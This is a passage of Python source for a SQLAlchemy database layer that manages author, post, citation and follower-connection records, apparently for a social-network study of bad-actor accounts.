WHERE(authors.xml_importer_insertion_date IS NOT NULL \\\n OR authors.mark_missing_bad_actor_retweeters_insertion_date IS NOT NULL ) \\\n AND authors.author_osn_id IS NOT NULL AND authors.domain = :domain \")\n res = self.session.execute(query, params=dict(domain=domain))\n all_rows = res.cursor.fetchall()\n\n for row in all_rows:\n data[row[0]] = row[1]\n return data\n\n '''\n def get_author_by_id(self, author_id):\n\n query = self.session.query(Author).filter(Author.author_id == author_id)\n posts_result = query.all()\n\n #query = \"SELECT * FROM \" + self.posts + \" WHERE post_id=\" + str(post_id)\n #result = self.session.execute(query)\n #cursor = result.cursor\n #posts_result = cursor.fetchall()\n\n if len(posts_result):\n post = self.create_object(posts_result)\n return post\n return None\n '''\n\n def delete_author(self, name, domain, author_guid):\n self.session.query(Author).filter(\n (Author.name == name) & (Author.domain == domain) & (Author.author_guid == author_guid)).delete()\n self.session.commit()\n\n def update_author(self, author):\n self.session.merge(author)\n\n def update_author_type_by_author_guid(self, guid, type):\n self.session.query(Author).filter(Author.author_guid == guid).update({'author_type': type})\n self.session.commit()\n\n def get_author_name_by_post_content(self, post_content):\n query = text(\"select posts.author from posts where posts.content like :post_content\")\n res = self.session.execute(query, params=dict(post_content=post_content + \"%\"))\n return [author_name[0] for author_name in res]\n\n ###########################################################\n # author_citations\n ###########################################################\n\n def deleteAuthCit(self, window_start=None):\n if window_start:\n self.session.query(AuthorCitation).filter(AuthorCitation.window_start == window_start).delete()\n\n else:\n self.session.query(AuthorCitation).delete()\n self.session.commit()\n pass\n\n def insertIntoAuthorCitation(self, win_start, win_end):\n\n q = text(\n \" insert into author_citations (from_author, from_domain, to_author, to_domain, window_start, window_end, number_of_citations,from_author_guid,to_author_guid) \\\n select \\\n p1.author as from_author, \\\n p1.domain as from_domain, \\\n p2.author as to_author, \\\n p2.domain as to_domain, \\\n :window_start as window_start, \\\n :window_end as window_end, \\\n count(*) as number_of_citations, \\\n p1.author_guid as from_author_guid, \\\n p2.author_guid as to_author_guid \\\n from \\\n post_citations as ref \\\n inner join posts as p1 on p1.post_id=ref.post_id_from \\\n inner join posts as p2 on p2.post_id=ref.post_id_to \\\n where \\\n p2.author_guid>'' and p1.author_guid>'' and \\\n :window_start <= p1.date and p1.date <= :window_end \\\n group by from_author, from_domain, to_author, to_domain \")\n\n self.session.execute(q, params=dict(window_start=win_start, window_end=win_end))\n self.commit()\n\n ###########################################################\n # author_features\n ###########################################################\n\n def get_author_features_by_author_guid(self, author_guid):\n result = self.session.query(AuthorFeatures).filter(AuthorFeatures.author_guid == author_guid).all()\n if len(result) > 0:\n return result\n return None\n\n def get_author_feature(self, author_guid, attribute_name):\n result = self.session.query(AuthorFeatures).filter(and_(AuthorFeatures.author_guid == author_guid,\n AuthorFeatures.attribute_name == attribute_name)).all()\n if len(result) > 0:\n return result[0]\n return None\n\n def get_author_features(self):\n\n result = self.session.query(AuthorFeatures).all()\n # if len(result) > 0:\n return result\n # return None\n\n def get_author_features_labeled_authors_only(self):\n query = text('select author_features.* \\\n from \\\n author_features \\\n inner join authors on (author_features.author_guid = authors.author_guid) \\\n where authors.author_type is not null')\n result = self.session.execute(query)\n cursor = result.cursor\n author_features = cursor.fetchall()\n return author_features\n\n def get_author_features_lazy(self, offset=0, yield_per=10000):\n result = self.session.query(AuthorFeatures).yield_per(yield_per).enable_eagerloads(False).offset(offset)\n return result\n\n def get_author_features_labeled_authors_only_lazy(self, offset=0, yield_per=10000):\n result = self.session.query(AuthorFeatures)\\\n .join(source_table, AuthorFeatures.author_guid == Author.author_guid)\\\n .filter(authors.author_type.isnot(None))\\\n .yield_per(yield_per).enable_eagerloads(False).offset(offset)\n return result\n\n\n # def get_author_features_by_author_id_field(self, author_id_field, target_field, is_labeled, ):\n # logging.info(\"Start getting authors features\")\n # if is_labeled:\n # query = text('select author_features.*, authors.'+target_field+' \\\n # from \\\n # author_features \\\n # inner join authors on (author_features.author_guid = authors.'+author_id_field+') \\\n # where authors.author_type is not null')\n # # query = text('select author_features.*, authors.'+target_field+' \\\n # # from \\\n # # author_features \\\n # # inner join authors on (author_features.author_guid = authors.name) where authors.author_type is not null')\n # else:\n # query = text('select author_features.*, authors.' + target_field + ' \\\n # from \\\n # author_features \\\n # inner join authors on (author_features.author_guid = authors.' + author_id_field + ') \\\n # where authors.author_type is null')\n # result = self.session.execute(query)\n # cursor = result.cursor\n # author_features = cursor.fetchall()\n # logging.info(\"Finished getting authors features\")\n #\n # return author_features\n\n def get_author_features_by_author_id_field(self, author_id_field, target_field, is_labeled):\n logging.info(\"Start getting authors features\")\n if is_labeled:\n query = text(\n 'select author_features.*, authors.' + target_field + ' from author_features inner join authors on (author_features.author_guid = authors.' + author_id_field + ') where authors.author_type is not null')\n # query = text('select author_features.*, authors.'+target_field+' \\\n # from \\\n # author_features \\\n # inner join authors on (author_features.author_guid = authors.name) where authors.author_type is not null')\n else:\n query = text('select author_features.*, authors.' + target_field + ' \\\n from \\\n author_features \\\n inner join authors on (author_features.author_guid = authors.' + author_id_field + ') \\\n where authors.author_type is null')\n result = self.session.execute(query)\n cursor = result.cursor\n author_features = cursor.fetchall()\n logging.info(\"Finished getting authors features\")\n\n return author_features\n\n def get_author_features_unlabled_authors_only_by_author_id_field(self, author_id_field, target_field):\n logging.info(\"Start getting authors features\")\n\n query = text('select author_features.*, authors.' + target_field + ' \\\n from \\\n author_features \\\n inner join authors on (author_features.author_guid = authors.' + author_id_field + ') \\\n where authors.author_type is null')\n result = self.session.execute(query)\n cursor = result.cursor\n author_features = cursor.fetchall()\n logging.info(\"Finished getting authors features\")\n return author_features\n\n def insert_authors_features(self, list_author_features):\n self.session.add_all(list_author_features)\n\n def update_author_features(self, author_features):\n self.session.merge(author_features)\n\n def update_target_articles(self, target_article):\n self.session.merge(target_article)\n\n def update_image_hidden_text(self, image_hidden_text):\n self.session.merge(image_hidden_text)\n\n def add_author_features(self, author_features):\n logging.info(\"total Author Features inserted to DB: \" + str(len(author_features)))\n i = 1\n for author_feature in author_features:\n if (i % 100 == 0):\n msg = \"\\r Insert author featurs to DB: [{}\".format(i) + \"/\" + str(len(author_features)) + ']'\n print(msg, end=\"\")\n i += 1\n self.update_author_features(author_feature)\n self.commit()\n\n def convert_auhtor_feature_author_id_form_author_name_to_author_guid(self):\n query = \"update author_features SET author_guid = (select author_guid from authors where authors.name = author_features.author_guid)\"\n self.session.execute(q)\n self.commit()\n\n def add_target_articles(self, target_articles):\n logging.info(\"target_articles inserted to DB: \" + str(len(target_articles)))\n i = 1\n for target_article in target_articles:\n if (i % 100 == 0):\n msg = \"\\r Insert target_article to DB: [{}\".format(i) + \"/\" + str(len(target_articles)) + ']'\n print(msg, end=\"\")\n i += 1\n self.update_target_articles(target_article)\n self.commit()\n\n def add_image_hidden_texts(self, image_hidden_texts):\n logging.info(\"image_hidden_texts inserted to DB: \" + str(len(image_hidden_texts)))\n i = 1\n for image_hidden_text in image_hidden_texts:\n if (i % 100 == 0):\n msg = \"\\r Insert image_hidden_text to DB: [{}\".format(i) + \"/\" + str(len(image_hidden_texts)) + ']'\n print(msg, end=\"\")\n i += 1\n self.update_image_hidden_text(image_hidden_text)\n self.commit()\n\n def delete_authors_features(self):\n q = text(\"delete from author_features\")\n self.session.execute(q)\n self.commit()\n\n def delete_from_authors_features_trained_authors(self, author_guids_to_remove):\n self.session.query(AuthorFeatures).filter(AuthorFeatures.author_guid.in_(author_guids_to_remove)).delete(\n synchronize_session='fetch')\n self.session.commit()\n\n ###########################################################\n # key_authors\n ###########################################################\n def get_key_authors(self):\n query = text(\"SELECT author_name FROM export_key_authors\")\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n return [rec[0] for rec in records]\n\n def get_sum_tfidf_scores(self):\n '''\n :return: A map of author_guid->sumtfidf\n '''\n query = text(\"SELECT export_key_authors.author_guid, \"\n \"export_key_authors.SumTFIDF \"\n \"FROM export_key_authors \"\n \"JOIN authors \"\n \"ON export_key_authors.author_guid = authors.author_guid \"\n \"WHERE domain='Microblog'\")\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n return {rec[0]: rec[1] for rec in records}\n\n def get_max_tfidf_scores(self):\n '''\n :return: A map author_guid->maxtfidf\n '''\n query = text(\"SELECT export_key_authors.author_guid, \"\n \"export_key_authors.MaxTFIDF \"\n \"FROM export_key_authors \"\n \"JOIN authors \"\n \"ON export_key_authors.author_guid = authors.author_guid \"\n \"WHERE domain='Microblog'\")\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n return {rec[0]: rec[1] for rec in records}\n\n def is_export_key_authors_view_exist(self):\n query = text(\"SELECT name FROM sqlite_master WHERE type='view' AND name='export_key_authors'\")\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n return len(records) != 0\n\n ###########################################################\n # author_boost_scores\n ###########################################################\n def deleteBoostAuth(self, window_start=None):\n if window_start:\n self.session.query(Post_to_pointers_scores).filter(\n Post_to_pointers_scores.window_start == window_start).delete()\n self.session.query(Author_boost_stats).filter(Author_boost_stats.window_start == window_start).delete()\n\n else:\n self.session.query(Post_to_pointers_scores).delete()\n self.session.query(Author_boost_stats).delete()\n self.session.commit()\n pass\n\n def getPostsListWithoutEmptyRowsByDate(self, window_start, window_end):\n\n q = text(\"select * from posts where content is not NULL and (:window_start <= date and date <= :window_end)\")\n references = []\n res = self.session.execute(q, params=dict(window_start=window_start, window_end=window_end))\n posts = [list(post.values()) for post in res]\n return posts\n\n def getPostsListWithoutEmptyRowsByDomain(self, domain):\n\n q = text(\"select * from posts where content is not NULL and domain = :domain\")\n references = []\n res = self.session.execute(q, params=dict(domain=domain))\n posts = [list(post.values()) for post in res]\n return posts\n\n def getPostsListWithoutEmptyRows(self):\n q = text(\"select * from posts where content is not NULL\")\n references = []\n res = self.session.execute(q)\n posts = [list(post.values()) for post in res]\n return posts\n\n def get_author_guid_post_dict(self):\n author_guid_posts_dict = defaultdict(list)\n posts = self.get_posts()\n for post in posts:\n author_guid_posts_dict[post.author_guid].append(post)\n return author_guid_posts_dict\n\n def addAuthor_boost_stats(self, author_boost_stats):\n self.session.merge(author_boost_stats)\n\n def addAuthors_boost_stats(self, authors_boost_stats):\n for author_boost_stats in authors_boost_stats:\n self.addAuthor_boost_stats(author_boost_stats)\n self.session.commit()\n\n def addPost_to_pointers_scores(self, post_to_pointers_scores):\n self.session.merge(post_to_pointers_scores)\n\n def addPosts_to_pointers_scores(self, posts_to_pointers_scores):\n for post_to_pointers_scores in posts_to_pointers_scores:\n self.addPost_to_pointers_scores(post_to_pointers_scores)\n self.session.commit()\n\n def getReferencesFromPost(self, postid):\n urlToList = []\n references = self.session.query(Post_citation).filter(Post_citation.post_id_from == postid).all()\n for ref in references:\n urlToList.append(ref.url_to)\n return list(set(urlToList))\n\n def getAuthor_boost_stats(self, author_guid):\n result = self.session.query(Author_boost_stats).filter(Author_boost_stats.author_guid == author_guid).all()\n\n if len(result) > 0:\n return result[0]\n return None\n\n def get_all_authors_boost_stats(self):\n result = self.session.query(Author_boost_stats).filter(\n Author_boost_stats.author_domain == str(domain)).all()\n\n if len(result) > 0:\n return result\n return None\n\n ###########################################################\n # post_retweeter_connections\n ###########################################################\n def get_post_retweeter_connections_by_post_id(self, post_id):\n return self.session.query(PostRetweeterConnection).filter(PostRetweeterConnection.post_osn_id == post_id).all()\n\n ###########################################################\n # authors\n ###########################################################\n\n def add_author(self, author):\n self.session.merge(author)\n\n def add_authors(self, authors):\n logging.info(\"-- add_authors --\")\n logging.info(\"Number of authors is: \" + str(len(authors)))\n i = 1\n for author in authors:\n msg = \"\\r Add author to DB: [{}\".format(i) + \"/\" + str(len(authors)) + ']'\n print(msg, end=\"\")\n i += 1\n self.add_author(author)\n self.commit()\n if len(authors) != 0: print(\"\")\n\n def get_author_by_author_guid(self, author_guid):\n result = self.session.query(Author).filter(Author.author_guid == author_guid).all()\n return result[0]\n\n def get_author_by_screen_name(self, screen_name):\n result = self.session.query(Author).filter(Author.author_screen_name == screen_name).all()\n return result[0]\n\n def get_author_by_author_guid_and_domain(self, author_guid, domain):\n result = self.session.query(Author).filter(and_(Author.author_guid == author_guid,\n Author.domain == domain)).all()\n return result\n\n def is_author_exists(self, author_guid, domain):\n author = self.get_author_by_author_guid_and_domain(author_guid, domain)\n return len(author) > 0\n\n def get_authors_retrieved_from_xml_importer(self):\n result = self.session.query(Author).filter(Author.xml_importer_insertion_date is not None).all()\n return result\n\n def get_retweet_count(self):\n query = text(\"\"\"select author_guid, count(posts.post_id)\n from posts\n where content like '%RT @%'\n group by author_guid\"\"\")\n result = self.session.execute(query)\n records = list(result.cursor.fetchall())\n return {rec[0]: rec[1] for rec in records}\n\n def get_retweets(self):\n query = text(\" select post_id, content from posts where content like '%RT @%'\")\n result = self.session.execute(query)\n records = list(result.cursor.fetchall())\n return {rec[0]: rec[1] for rec in records}\n\n def get_missing_data_twitter_screen_names(self):\n \"\"\"\n This function retrieves all the users who have missing information.\n These users are authors who has no twitter user id and their posts with url of twitter\n :return: list of screen names\n \"\"\"\n query = \"SELECT authors.name \" \\\n \"FROM authors \" \\\n \"WHERE authors.author_osn_id is NULL \" \\\n # \"AND (authors.is_suspended_or_not_exists is NULL \" \\\n # \"OR authors.is_suspended_or_not_exists = 0) \" \\\n # \"AND authors.domain = 'Microblog' \" \\\n # \"AND authors.author_type IS NULL \" \\\n # \"GROUP BY authors.name\" #TODO: Domains.MICROBLOG\n # \"LIMIT 35;\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n screen_names = list(cursor.fetchall())\n twitter_screen_names = [r[0] for r in screen_names]\n return twitter_screen_names\n\n def get_missing_data_twitter_screen_names_by_posts(self):\n query = \"SELECT DISTINCT(posts.author) \" \\\n \"FROM posts WHERE LOWER(posts.author) NOT IN \" \\\n \"(SELECT LOWER(author_screen_name) FROM authors WHERE author_osn_id IS NOT NULL)\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n screen_names = list(cursor.fetchall())\n twitter_screen_names = [r[0] for r in screen_names]\n return twitter_screen_names\n\n def get_missing_data_twitter_screen_names_by_authors(self):\n query = \"SELECT DISTINCT(author_screen_name) \" \\\n \"FROM authors WHERE author_osn_id IS NULL\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n screen_names = list(cursor.fetchall())\n twitter_screen_names = [r[0] for r in screen_names]\n return twitter_screen_names\n\n def get_authors_for_mark_as_suspended_or_not_existed(self):\n # This function retrieves all the users who are suspended or not existing.\n # We should run this query only when we finished to retrieve all the followers\n # after saving all of them we can be sure that twitter did not bring them due to their situation(suspended)\n query = \"SELECT * \" \\\n \"FROM authors \" \\\n \"INNER JOIN posts on (authors.author_guid = posts.author_guid) \" \\\n \"WHERE authors.author_osn_id is NULL \" \\\n \"AND authors.name = posts.author \" \\\n \"AND (posts.url LIKE \\'%http://twitter.com%\\' \" \\\n \"OR posts.url LIKE \\'%https://twitter.com%\\')\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n suspended_authors = list(cursor.fetchall())\n return suspended_authors\n\n def get_not_suspended_authors(self, domain):\n result = self.session.query(Author).filter(\n and_(Author.is_suspended_or_not_exists == None, Author.domain == domain)).all()\n return result\n\n def get_followers_brought_by_terms(self):\n # query = \"\"\"\n # SELECT DISTINCT(authors.author_osn_id)\n # FROM author_connections\n # INNER JOIN authors ON (authors.author_guid = author_connections.destination_author_guid)\n # WHERE author_connections.connection_type = 'term-author'\n # AND authors.author_osn_id NOT IN (\n # SELECT DISTINCT(temp_author_connections.source_author_osn_id)\n # FROM temp_author_connections\n # WHERE temp_author_connections.connection_type = 'follower'\n # )\n # \"\"\"\n # AND authors.author_osn_id IS NOT '18691328'\n query = \"\"\"\n SELECT DISTINCT(authors.author_osn_id)\n FROM author_connections\n INNER JOIN authors ON (authors.author_guid = author_connections.destination_author_guid)\n WHERE author_connections.connection_type = 'term-author'\n\n AND authors.author_osn_id NOT IN (\n SELECT DISTINCT(temp_author_connections.source_author_osn_id)\n FROM temp_author_connections\n WHERE temp_author_connections.connection_type = 'follower'\n )\n \"\"\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = cursor.fetchall()\n author_osn_ids = [tuple[0] for tuple in tuples]\n return author_osn_ids\n\n def get_followers_or_friends_candidats(self, connection_type, domain, limit):\n # This function retrieves all the user ids we would like to extract their followers.\n # These users are authors who are not the source in the connections table and not in follower type.\n # Moreover, bring me the authors who are not protected, and they are from twitter (type = microblog)\n\n # query = \"\"\"\n # SELECT *\n # FROM (SELECT authors.author_guid\n # FROM authors\n # WHERE authors.author_guid NOT IN(\n # SELECT source_author_guid\n # FROM author_connections\n # WHERE connection_type = :connection_type)\n # AND authors.protected = 0\n # AND authors.author_type is NULL\n # AND authors.domain = :domain\n # AND authors.xml_importer_insertion_date IS NOT NULL\n # AND authors.followers_count > 10\n # LIMIT 5)\n # \tUnion\n # SELECT author_guid\n # FROM (\n # SELECT authors.author_guid, authors.followers_count, authors.statuses_count\n # FROM authors\n # WHERE authors.author_type = 'bad_actor'\n # AND authors.statuses_count > 10\n # AND authors.followers_count > 10\n # AND authors.protected = 0\n # AND authors.author_guid NOT IN (\n # SELECT author_connections.source_author_guid\n # FROM author_connections\n # WHERE author_connections.connection_type = :connection_type)\n # ORDER BY authors.followers_count DESC, authors.statuses_count DESC\n # LIMIT 0)\n # \"\"\"\n\n query = \"\"\"\n SELECT authors.author_osn_id\n FROM authors\n WHERE authors.author_guid NOT IN(\n SELECT source_author_guid\n FROM author_connections\n WHERE connection_type = :connection_type)\n AND authors.protected = 0\n AND authors.domain = :domain\n AND {0} > 10\n LIMIT :limit\n \"\"\"\n if (connection_type == Author_Connection_Type.FOLLOWER):\n query = query.format('authors.followers_count')\n elif (connection_type == Author_Connection_Type.FRIEND):\n query = query.format('authors.friends_count')\n else:\n query = query.format('11')\n query = text(query)\n result = self.session.execute(query, params=dict(connection_type=connection_type, domain=domain, limit=limit))\n cursor = result.cursor\n return cursor\n\n def get_twitter_author_ids_for_extracting_friends(self):\n # This function retrieves all the user ids we would like to extract their followers.\n # These users are authors who are not the source in the connections table and not in follower type.\n # Moreover, bring me the authors who are not protected, and they are from twitter (type = microblog)\n '''\n query = \"SELECT authors.author_osn_id \" \\\n \"FROM authors \" \\\n \"WHERE authors.author_osn_id NOT IN \" \\\n \"(SELECT authors.author_osn_id \" \\\n \"FROM authors \" \\\n \"INNER JOIN author_connections ON \" \\\n \"(authors.author_osn_id = author_connections.source_author_osn_id) \" \\\n \"WHERE author_connections.connection_type = 'friend') \" \\\n \"AND authors.protected = 0 \" \\\n \"AND authors.domain = 'Microblog' \" \\\n \"AND authors.xml_importer_insertion_date IS NOT NULL \" \\\n \"AND authors.missing_data_complementor_insertion_date IS NOT NULL \" \\\n \"AND authors.friends_count > 0 \" \\\n #\"LIMIT 20;\"\n '''\n query = \"SELECT * \" \\\n \"FROM (\" \\\n \"SELECT authors.author_osn_id \" \\\n \"FROM authors \" \\\n \"WHERE authors.author_osn_id NOT IN(\" \\\n \"SELECT author_connections.source_author_osn_id \" \\\n \"FROM author_connections \" \\\n \"WHERE author_connections.connection_type = 'friend') \" \\\n \"AND authors.protected = 0 \" \\\n \"AND authors.author_type is NULL \" \\\n \"AND authors.domain = 'Microblog' \" \\\n \"AND authors.xml_importer_insertion_date IS NOT NULL \" \\\n \"AND authors.friends_count > 10 \" \\\n \"LIMIT 35) \" \\\n \"Union \" \\\n \"SELECT author_osn_id \" \\\n \"FROM (\" \\\n \"SELECT authors.author_osn_id, authors.friends_count, authors.statuses_count \" \\\n \"FROM authors \" \\\n \"WHERE authors.author_type = 'bad_actor' \" \\\n \"AND authors.statuses_count > 10 \" \\\n \"AND authors.friends_count > 10 \" \\\n \"AND authors.protected = 0 \" \\\n \"AND authors.author_osn_id NOT IN (\" \\\n \"SELECT author_connections.source_author_osn_id \" \\\n \"FROM author_connections \" \\\n \"WHERE author_connections.connection_type = 'friend') \" \\\n \"ORDER BY authors.friends_count DESC, authors.statuses_count DESC \" \\\n \"LIMIT 35)\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n ids = list(cursor.fetchall())\n twitter_ids = [r[0] for r in ids]\n return twitter_ids\n\n def get_screen_names_for_twitter_authors_by_posts(self):\n screen_names = []\n http_twitter_prefix = str('%http://twitter.com%')\n https_twitter_prefix = str('%https://twitter.com%')\n results = self.session.query(Post.url).filter(and_(Post.xml_importer_insertion_date is not None,\n Post.author == Author.name,\n Author.missing_data_complementor_insertion_date is None,\n or_(Post.url.like(http_twitter_prefix),\n Post.url.like(https_twitter_prefix)))).all()\n\n expression_one = r\"(?<=http:\\/\\/twitter\\.com\\/)\\w+(?=\\/statuses\\/\\d+)\"\n expression_two = r\"(?<=https:\\/\\/twitter\\.com\\/)\\w+(?=\\/statuses\\/\\d+)\"\n r_one = re.compile(expression_one, re.VERBOSE)\n r_two = re.compile(expression_two, re.VERBOSE)\n for result in results:\n twitter_url = result[0]\n optional_screen_names = r_one.findall(twitter_url)\n if optional_screen_names:\n screen_name = optional_screen_names[0]\n screen_names.append(screen_name)\n else:\n optional_screen_names = r_two.findall(twitter_url)\n if optional_screen_names:\n screen_name = optional_screen_names[0]\n screen_names.append(screen_name)\n return screen_names\n\n def get_twitter_authors_retrieved_from_vico_importer(self):\n '''\n query = text(\"SELECT * FROM authors JOIN posts on posts.author = authors.name WHERE posts.xml_importer_insertion_date IS NOT NULL AND authors.bad_actors_markup_insertion_date is NULL AND (posts.url LIKE '%http://twitter.com%' OR posts.url LIKE '%https://twitter.com%');\")\n result = self.session.execute(query)\n authors = [author.values() for author in result]\n return authors\n '''\n\n result = self.session.query(Author).filter(and_(Post.xml_importer_insertion_date is not None),\n (Post.author == Author.name),\n (Author.missing_data_complementor_insertion_date is None),\n or_(Post.url.like('%http://twitter.com%'),\n Post.url.like('%https://twitter.com%'))).all()\n return result\n\n def add_author_connection(self, author_connection):\n self.session.merge(author_connection)\n\n def add_post_retweeter_connection(self, post_retweeter_connection):\n self.session.merge(post_retweeter_connection)\n\n def add_author_connections(self, author_connections):\n total = len(author_connections)\n current = 0\n for author_connection in author_connections:\n current += 1\n msg = '\\r adding ' + str(current) + ' of ' + str(total) + ' author_connections'\n print(msg, end=\"\")\n self.add_author_connection(author_connection)\n self.session.commit()\n\n def get_author_connections_dict(self):\n authors_connections = self.session.query(AuthorConnection).all();\n authors_connections_dict = defaultdict(list)\n for authors_connection in authors_connections:\n authors_connections_dict[authors_connection.connection_type].append(authors_connection)\n return authors_connections_dict\n\n def get_author_connections_by_author_guid(self, source_author_guid):\n return self.session.query(AuthorConnection).filter(\n AuthorConnection.source_author_guid == source_author_guid).all();\n\n def add_post_retweeter_connections(self, post_retweeter_connections):\n for post_retweeter_connection in post_retweeter_connections:\n self.add_post_retweeter_connection(post_retweeter_connection)\n self.session.commit()\n\n def get_vico_importer_bad_actors(self):\n vico_importer_bad_actors = self.session.query(Author).filter(and_(Author.author_type == Author_Type.BAD_ACTOR,\n or_(\n Author.xml_importer_insertion_date is not None,\n Author.vico_dump_insertion_date is not None))).all()\n number_of_vico_importer_bad_actors = len(vico_importer_bad_actors)\n logging.info(\"Number of bad_actors which found by VICO is: \" + str(number_of_vico_importer_bad_actors))\n return vico_importer_bad_actors\n\n def get_bad_actor_ids(self):\n logging.info(\"get_bad_actor_retweeters_not_retrieved_from_vico\")\n\n query = \"SELECT authors.author_osn_id \" \\\n \"FROM authors \" \\\n \"WHERE authors.author_type = 'bad_actor'\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n ids = list(cursor.fetchall())\n twitter_authors_ids = [r[0] for r in ids]\n logging.info(\"Number of bad actor o is: \" + str(len(twitter_authors_ids)))\n return twitter_authors_ids\n\n number_of_bad_actors = len(bad_actors)\n logging.info(\"Number of bad_actors which found by VICO is: \" + str(number_of_bad_actors))\n return bad_actors\n\n def get_vico_importer_potential_good_actors(self):\n vico_importer_potential_good_actors = self.session.query(Author).filter(and_(Author.author_type is None,\n Author.missing_data_complementor_insertion_date is not None,\n Author.xml_importer_insertion_date is not None)).all()\n # or_(Author.xml_importer_insertion_date != None,\n # Author.vico_dump_insertion_date != None))).all()\n number_of_vico_importer_potential_good_actors = len(vico_importer_potential_good_actors)\n logging.info(\n \"Number of vico_importer_potential_good_actors is: \" + str(number_of_vico_importer_potential_good_actors))\n return vico_importer_potential_good_actors\n\n def convert_twitter_users_to_authors(self, users, targeted_social_network, author_type, inseration_type):\n authors = []\n seen_authors = set()\n logging.info(\"Convert twitter users to authors: \" + str(len(users)))\n i = 1\n for user in users:\n author = self.convert_twitter_user_to_author(user, targeted_social_network, author_type, inseration_type)\n if author.author_guid not in seen_authors:\n authors.append(author)\n seen_authors.add(author.author_guid)\n msg = \"\\r Author record was converted: {0} [{1}/{2}]\".format(author.author_screen_name, i, str(len(users)))\n print(msg, end=\"\")\n # print(\"Author record was converted: \" + author.author_screen_name)\n i += 1\n # logging.info(\"Author record was converted: \" + author.author_screen_name)\n return authors\n\n def convert_twitter_user_to_author(self, osn_user, targeted_social_network, author_type, inseration_type):\n author_screen_name = str(osn_user.screen_name)\n author_guid = compute_author_guid_by_author_name(author_screen_name)\n\n domain = Domains.MICROBLOG\n # result = self.get_author_by_author_guid(author_guid)\n # if len(result) == 0:\n author = Author()\n # else:\n # author = result[0]\n\n author.author_screen_name = str(author_screen_name)\n author.name = author_screen_name # .lower()\n author.domain = str(targeted_social_network)\n\n author.author_guid = str(author_guid)\n\n author.author_full_name = str(osn_user.name)\n author.author_osn_id = str(osn_user.id)\n author.description = str(osn_user.description)\n author.created_at = str(osn_user.created_at)\n author.statuses_count = osn_user.statuses_count\n author.followers_count = osn_user.followers_count\n author.friends_count = osn_user.friends_count\n author.favourites_count = osn_user.favourites_count\n author.listed_count = osn_user.listed_count\n author.language = str(osn_user.lang)\n author.profile_background_color = osn_user.profile_background_color\n author.profile_background_tile = osn_user.profile_background_tile\n author.profile_banner_url = osn_user.profile_banner_url\n author.profile_image_url = osn_user.profile_image_url\n author.profile_link_color = osn_user.profile_link_color\n author.profile_sidebar_fill_color = osn_user.profile_sidebar_fill_color\n author.profile_text_color = osn_user.profile_text_color\n author.default_profile = osn_user.default_profile\n author.contributors_enabled = osn_user.contributors_enabled\n author.default_profile_image = osn_user.default_profile_image\n author.geo_enabled = osn_user.geo_enabled\n author.protected = osn_user.protected\n author.location = str(osn_user.location)\n author.notifications = osn_user.notifications\n author.time_zone = str(osn_user.time_zone)\n author.url = str(osn_user.url)\n author.utc_offset = osn_user.utc_offset\n author.verified = osn_user.verified\n author.is_suspended_or_not_exists = None\n\n if author_type is Author_Type.BAD_ACTOR:\n author.author_type = author_type\n self.set_inseration_date(author, inseration_type)\n\n return author\n\n # set date to authors\n def set_inseration_date(self, author, inseration_type):\n # now = unicode(get_current_time_as_string())\n now = self._date\n if inseration_type == DB_Insertion_Type.BAD_ACTORS_COLLECTOR:\n author.bad_actors_collector_insertion_date = now\n elif inseration_type == DB_Insertion_Type.XML_IMPORTER:\n author.xml_importer_insertion_date = now\n elif inseration_type == DB_Insertion_Type.MISSING_DATA_COMPLEMENTOR:\n author.missing_data_complementor_insertion_date = now\n elif inseration_type == DB_Insertion_Type.BAD_ACTORS_MARKUP:\n author.bad_actors_markup_insertion_date = now\n elif inseration_type == DB_Insertion_Type.MARK_MISSING_BAD_ACTOR_RETWEETERS:\n author.mark_missing_bad_actor_retweeters_insertion_date = now\n\n def create_author_connections(self, source_id, destination_author_ids, weight, author_connection_type,\n insertion_date):\n print(\"---create_author_connections---\")\n author_connections = []\n for destination_author_id in destination_author_ids:\n author_connection = self.create_author_connection(source_id, destination_author_id, weight,\n author_connection_type, insertion_date)\n author_connections.append(author_connection)\n\n return author_connections\n\n def create_author_connection(self, source_author_guid, destination_author_guid, weight, connection_type,\n insertion_date):\n # print(\"---create_author_connection---\")\n author_connection = AuthorConnection()\n\n # msg = '\\r Author connection: source -> ' + str(source_author_guid) + ', dest -> ' + str(\n # destination_author_guid) + ', connection type = ' + connection_type\n # print(msg, end=\"\")\n\n # print(\"Author connection: source -> \" + str(source_author_guid) + \", dest -> \" + str(destination_author_guid) + \", connection type = \" + connection_type)\n author_connection.source_author_guid = source_author_guid\n author_connection.destination_author_guid = destination_author_guid\n author_connection.connection_type = str(connection_type)\n author_connection.weight = str(weight)\n author_connection.insertion_date = insertion_date\n\n return author_connection\n\n def save_author_connections(self, author_connections):\n print(\"---Saving author connections in DB---\")\n save_author_connections_start_time = time.time()\n # self.add_author_connections(author_connections)\n self.add_author_connections_fast(author_connections)\n save_author_connections_end_time = time.time()\n save_author_connections_time = save_author_connections_end_time - save_author_connections_start_time\n print(\"Saving author connections in DB took in seconds: \" + str(save_author_connections_time))\n\n def create_and_save_author_connections(self, source_author_id, follower_ids, weight, connection_type):\n author_connections = self.create_author_connections(source_author_id, follower_ids, weight, connection_type,\n self._window_start)\n self.save_author_connections(author_connections)\n\n def get_author_connections_by_type(self, connection_type):\n # print(\"get_author_connections_by_type: \" + str(connection_type))\n query = self.session.query(AuthorConnection).filter(AuthorConnection.connection_type == connection_type)\n res = self.session.execute(query)\n cursor = res.cursor\n return cursor\n\n def result_iter(self, cursor, arraysize=1000):\n 'An iterator that uses fetchmany to keep memory usage down'\n while True:\n results = cursor.fetchmany(arraysize)\n if not results:\n break\n for result in results:\n yield result\n\n def get_post_min_date(self):\n query = \"SELECT MIN(posts.date) \" \\\n \"FROM posts\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n fetched_curser = cursor.fetchall()\n str_date_object = 